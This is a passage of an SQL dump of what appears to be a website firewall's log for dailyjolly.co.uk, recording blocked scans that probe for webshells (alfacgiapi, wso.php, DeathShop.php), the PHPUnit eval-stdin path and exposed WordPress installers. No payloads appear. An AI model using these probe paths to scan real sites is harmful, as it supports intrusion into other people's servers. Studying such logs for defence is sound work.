(Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','7gW3rbvxuYSCFJEMqLGOo1K4',0,1673922544.6302,228,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/controller/extension/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','dw3FLTPk82q74SbJHa9vsfne',0,1673922552.0093,250,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/controller/extension/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ZrBSR9Hjo3vQgGc8p24ly6CX',0,1673922559.1211,224,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','RhswqiHdQUjxImOF59Jnebtu',0,1673922565.2681,303,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/controller/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','WU2PJNHE3wTz7gCS1DtGQ9bs',0,1673922566.0909,197,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/controller/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','51X9LqWkEhxsyzlQrRgjYZdJ',0,1673922573.1252,494,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/ALFA_DATA/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','gEsm8i9G4dxBFjCu0vV6eHOU',0,1673922581.1417,236,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/admin/alfacgiapi/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','8TupmC0U5Mbj9KlN6YJQAI4W',0,1673922588.6213,215,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','RdTM16CKLtGajnUcXwb85HZg',0,1673922590.1134,282,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/database.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','h5bAmtkCpzXIoL8PMTxQ02sB',0,1673922591.6488,183,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi-bin/mt/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','n2aHcCXQy3RuzpNbwGhqOoAx',0,1673922593.0873,250,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi-bin/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','rFZAf5mHMlW7g23GuaJwiOEj',0,1673922594.5324,214,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/mt/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','yaxqpIC4Q3JBbVimP5gtcj7S',0,1673922595.9939,204,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GmrWtwqK2OCSxs04AzFY7N3B',0,1673922597.4514,180,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi-bin/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','BF0w1fPevrLM6l4R2iq9CTo8',0,1673922598.8589,215,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','6Qfl80jqRpdC7XoDc3EUPWxt',0,1673922600.3187,218,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','pGiaswVBkfmyocLndFqIh65r',0,1673922601.8160,264,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','OPDaoqYxM02ZR9Jem38FLWsS',0,1673922603.3291,196,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi-bin/MT/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','qYoBM7XvpF1ZlmNfI2iPW84U',0,1673922604.7645,243,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi-bin/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','KqtO6Iv8SnpMPTa3GLeC7Vwo',0,1673922606.2156,276,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/MT/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','sA9moEG3yQfPeiVb08c6MHCL',0,1673922607.7477,163,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','EhwYlkygDXOd5FG6ReCJtizV',0,1673922609.1309,208,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/mtos/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','FqoUiDfjAw67kx2rMlg1Tv98',0,1673922610.5428,219,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','vBItgzeoDyANqr8EaciJF4kX',0,1673922611.9613,188,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cms/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','Uy31OpZ4nG2dvL9W8JwKhECP',0,1673922613.3931,169,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Ycfab1iSMZvjx5zIh74pAq3K',0,1673922614.8047,266,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','k9nvOEBtjeZVsw2XC75WDJ3R',0,1673922616.6352,227,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','YAk4yEraPljU2X5g0Rmp9noF',0,1673922618.1010,271,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cgi/mt-xmlrpc.cgi','','{\"1\":\"python-requests\\/2.28.1\"}','NsYiophOqB5IJc08rmegVyz3',0,1673922619.6125,276,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/DeathShop.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mig9ARFMjHnPV7T5QXzxeLCo',0,1673922621.0884,301,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','CGOQp9z1H58lgXr7ysxvSAdU',0,1673922622.5990,250,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','IBHEdaYoyVU3LRuQnG12tpJM',0,1673922624.0642,256,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/pridmag/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','4N18u3yGilgkAdE0TFOhfLUM',0,1673922625.7407,305,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/pridmag/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','254iW3DMoVReTShln1EwsujZ',0,1673922627.2997,194,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Nc3YgvHeUfFpPWEC6y7u8sXr',0,1673922628.7166,251,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','TQ2RKst9lSOwmkBNYErMdUWA',0,1673922630.1918,226,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','b6mXepE4KusMjJwHCzi2VhR5',0,1673922631.6542,293,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','31WB0TUJgpC6vwF8aryjKQ9Y',0,1673922633.2173,189,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','2utfBKY4V31AXviDCHI8kLgP',0,1673922634.6119,273,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.28.1\"}','pzuQ6kDjxrwCfqJnodBsZvMc',0,1673922639.4540,240,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','s20vZCgd9NxaetBnqRIPVo3W',0,1673922643.6411,203,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wp/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3rEVkbyFjdwRaPQu1CslMzN2',0,1673922645.2519,266,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','IXdxyDOKVzCMN5sJTb4mGoYH',0,1673922646.7007,307,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/new/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','ZLFo13fQRvWsJlhNx6kqnVK8',0,1673922648.3717,555,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mG86fZXR9QNeaCE2PBOw0zIH',0,1673922650.2361,445,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/old/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','1Ht5J9IjTaEvSWze3Lr4o6ND',0,1673922652.0801,309,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','57VTuBUwO69Wby3pqFAlLMYJ',0,1673922653.6100,246,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/wordpress/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','rSq1zBID6y8QZ9GjtJKWk045',0,1673922655.1445,205,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','L8DFx0K7Bqhdwc5sSORTezmp',0,1673922656.6019,248,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/test/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','1Q7YdAxGDhJCjeMcuyom9RLr',0,1673922658.1487,228,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','3WPxY84dmjEIklzcM1F9SuAt',0,1673922659.5643,321,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/blog/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','BgzN7s0nORFyqUW5rdSviGZX',0,1673922661.1210,175,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','pqojvz0SkDra9XPNIE1YO4Fu',0,1673922662.5257,234,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/cms/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','FnJkti6P1hIERSGTVCw8LK3p',0,1673922664.0496,200,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jBGeDOpT3y80aYVMEgroSwki',0,1673922665.4597,213,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/web/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','rzQ5R8E7XkFh3JnNeUiyldbM',0,1673922666.8899,177,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','9w8HdJ7yZgjez56kNtMITiUv',0,1673922668.2990,218,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/backup/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Dz7fZuyhSEW2n3RqXOpK4gYo',0,1673922669.7726,274,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','jL3Xf2qmQnxZlKvW4sE5kCAu',0,1673922671.2783,280,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/site/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','mYuKxOEFJnhC16pqSRj3DU2H',0,1673922672.8649,254,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','qE6wlk48hz5yTGNHIiQ2DnCu',0,1673922674.3334,301,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/oldsite/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Uj3Fwf0xloIZtKHX7Tp2nDu1',0,1673922676.1819,264,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/Paiement/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Z2CDnhrV8QsLUHExwb7SpRtj',0,1673922677.6351,329,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/Paiement/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','uEAZ2y6VJohIzW1KYabr0pLT',0,1673922679.1880,204,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/sandbox/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','UzcB9qONEi7hgdvPMaATjpoW',0,1673922680.6476,509,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://dailyjolly.co.uk/sandbox/wp-admin/setup-config.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','GJWg19MfUdH2a7FzyR48svh5',0,1673922682.5171,311,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','z2fikvm7SPlcXg0HIBrOty8n',0,1673922767.4907,262,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','lMy05tXKu9iA21JUpZoSYRkG',0,1673922913.8702,256,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','i1GspYIc83ayoRmSdBVUKhtb',0,1673923139.1995,324,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','CopUbVDEIFKqgP3krJ2Ri0Nd',0,1673923257.3466,250,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','tSOGJDmAwcagYd2n85ykbR6I',0,1673923374.6622,208,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','sNIMd9eA0jyk5XvbR2VKGHuq',0,1673923525.2519,280,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','HvDyJX7Ph381jRgbS0VKadnG',0,1673923623.8038,279,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','0EIt2z61HcrkVwyhLm4bQC8K',0,1673923695.2182,203,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','02WHVDJuvx6Po7ITdQBOiS3e',0,1673923766.5917,302,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','9txAZKYkgWQfOH5V3Fp1Iehm',0,1673923840.9244,285,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','tnu0S6ewpIaZlXCFzrNGOYgv',0,1673923896.5793,224,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','SXPbZ8dYFpAmkMG4lehr2LV5',0,1673923943.2182,330,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','E2VXf13M5JDcHPweyCYZknaN',0,1673924184.6309,244,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','kTZiXRVYWbvQz1UMeyN5rFLo',0,1673924221.4981,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rtbCahU2fgKdpVZRv0MYD935',0,1673924224.8669,266,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Sc0eITuEG4mdLBipAUrHYntQ',0,1673924226.0495,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','AmoEUbgR9tzNeCOGhMdV4D0c',0,1673924230.6525,247,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','aHc3EpBGJbt549XoqW2f0OVi',0,1673924231.2473,200,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 